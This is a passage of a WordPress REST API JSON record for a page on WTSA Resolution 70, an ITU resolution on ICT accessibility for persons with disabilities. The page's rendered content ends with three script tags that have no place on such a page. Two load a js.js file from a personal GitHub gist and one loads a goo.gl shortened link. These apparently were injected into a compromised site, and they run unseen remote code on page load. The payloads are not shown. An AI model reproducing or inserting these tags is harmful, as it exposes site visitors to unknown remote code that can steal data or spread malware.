src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTSA RESOLUTION 70 (Rev. Dubai, 2012) Telecommunication\/information and communication technology accessibility for persons with disabilities The World Telecommunication Standardization Assembly (Dubai, 2012), recognizing a) Resolution 175 (Guadalajara, 2010) of the Plenipotentiary Conference, on telecommunication\/information and communication technology (ICT) accessibility for persons with disabilities, including age-related disabilities; b) Resolution 58 (Hyderabad, 2010) of the World Telecommunication [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1545,"menu_order":70,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-717","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/717","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=717"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/717\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1545"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}